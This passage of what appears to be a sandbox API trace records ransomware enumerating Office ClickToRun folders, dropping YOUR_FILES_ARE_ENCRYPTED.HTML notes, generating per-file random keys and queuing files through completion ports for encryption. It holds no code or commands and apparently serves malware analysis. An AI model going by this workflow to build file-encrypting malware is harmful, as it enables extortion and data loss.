param_1=0x4ebd77e, param_2="%02X" | out: param_1="EA") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="91") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="7B") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="69") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="2D") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="FC") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: 
param_1="62") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="22") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="3F") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="F8") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="0A") returned 2 [0155.354] lstrcpyW (in: lpString1=0x743011c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat" [0155.354] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7420068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.354] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7420068, lpOverlapped=0x7420068) returned 1 [0155.362] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4dbcf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4dbcf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x32e90800, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x38b5ce, dwReserved0=0x0, dwReserved1=0x60, cFileName="stream.x86.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0 [0155.362] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0155.362] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0155.362] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\x-none.16\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0155.363] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0155.365] CloseHandle (hObject=0x594) returned 1 [0155.365] GetProcessHeap () returned 0x270000 [0155.366] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7410060 | out: hHeap=0x270000) returned 1 [0155.366] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2e48fa30, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e501e50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e501e50, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x-none.16", cAlternateFileName="")) returned 0 [0155.366] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0155.366] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0155.367] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0155.367] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0155.369] CloseHandle (hObject=0x58c) returned 1 [0155.370] GetProcessHeap () returned 0x270000 [0155.371] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0155.371] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fc83790, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2fc83790, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2fc83790, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x7b6, dwReserved0=0x0, dwReserved1=0x60, cFileName="DeploymentConfig.0.xml", cAlternateFileName="DEPLOY~1.XML")) returned 1 [0155.371] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml") returned 62 [0155.371] lstrcmpW (lpString1="DeploymentConfig.0.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.371] PathFindExtensionW (pszPath="DeploymentConfig.0.xml") returned=".xml" [0155.371] lstrlenW (lpString=".xml") returned 4 [0155.371] PathFindExtensionW (pszPath="DeploymentConfig.0.xml") returned=".xml" [0155.371] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: 
RandomBuffer=0x4ebde04) returned 1 [0155.371] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.0.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0155.371] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=1974) returned 1 [0155.371] GetProcessHeap () returned 0x270000 [0155.371] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7400058 [0155.372] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="21") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="4D") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="65") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="3A") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="EC") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="68") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="B2") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="84") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="35") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="11") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="8E") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="76") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="B5") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="EE") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: 
param_1="CC") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="97") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="FE") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="72") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="90") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="76") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="E1") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="65") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="36") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="A3") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="A4") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="FE") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="51") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="24") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="5B") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="9C") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="71") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="40") returned 2 [0155.374] lstrcpyW (in: lpString1=0x741010c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" [0155.374] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x7400058, 
NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.374] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7400058, lpOverlapped=0x7400058) returned 1 [0155.377] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x96c2d3b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96c2d3b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x96c2d3b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x0, dwReserved1=0x60, cFileName="DeploymentConfig.2.xml", cAlternateFileName="DEPLOY~2.XML")) returned 1 [0155.385] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml") returned 62 [0155.385] lstrcmpW (lpString1="DeploymentConfig.2.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.385] PathFindExtensionW (pszPath="DeploymentConfig.2.xml") returned=".xml" [0155.385] lstrlenW (lpString=".xml") returned 4 [0155.385] PathFindExtensionW (pszPath="DeploymentConfig.2.xml") returned=".xml" [0155.385] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0155.385] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.2.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0155.386] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=1382) returned 1 [0155.386] GetProcessHeap () returned 0x270000 [0155.386] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7400058 [0155.387] wsprintfW (in: 
param_1=0x4ebdd42, param_2="%02X" | out: param_1="D6") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="A2") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="24") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="9D") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="DF") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="80") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="64") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="32") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="90") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="33") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="C9") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="A7") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="BB") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="BF") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="3D") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="F5") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="11") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="64") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="30") returned 2 [0155.387] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="78") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="85") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="3B") returned 2 
[0155.388] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="A3") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="AA") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="13") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="6E") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="BC") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="F9") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="A5") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="E8") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="7D") returned 2 [0155.388] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="5C") returned 2 [0155.389] lstrcpyW (in: lpString1=0x741010c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml" [0155.389] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x7400058, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.389] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7400058, lpOverlapped=0x7400058) returned 1 [0155.389] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="MachineData", cAlternateFileName="MACHIN~1")) returned 1 [0155.391] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData") returned 51 [0155.391] GetProcessHeap () returned 0x270000 [0155.391] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74281b0 [0155.391] lstrcpyW (in: lpString1=0x74281b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData" [0155.405] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\*" [0155.405] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0155.406] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="..", 
cAlternateFileName="")) returned 1 [0155.406] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="Catalog", cAlternateFileName="")) returned 1 [0155.406] wnsprintfW (in: pszDest=0x74281b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned 59 [0155.406] GetProcessHeap () returned 0x270000 [0155.406] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74381b8 [0155.408] lstrcpyW (in: lpString1=0x74381b8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog" [0155.408] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*" [0155.408] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, 
cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0155.409] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.409] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Packages", cAlternateFileName="")) returned 1 [0155.409] wnsprintfW (in: pszDest=0x74381b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages") returned 68 [0155.409] GetProcessHeap () returned 0x270000 [0155.409] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74481c0 [0155.410] lstrcpyW (in: lpString1=0x74481c0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages" [0155.410] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*") 
returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*" [0155.410] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0155.410] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.410] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{9AC08E99-230B-47E8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 1 [0155.410] wnsprintfW (in: pszDest=0x74481c0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}") returned 107 [0155.410] GetProcessHeap 
() returned 0x270000 [0155.410] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0155.412] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}" [0155.412] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*" [0155.412] FindFirstFileW (in: 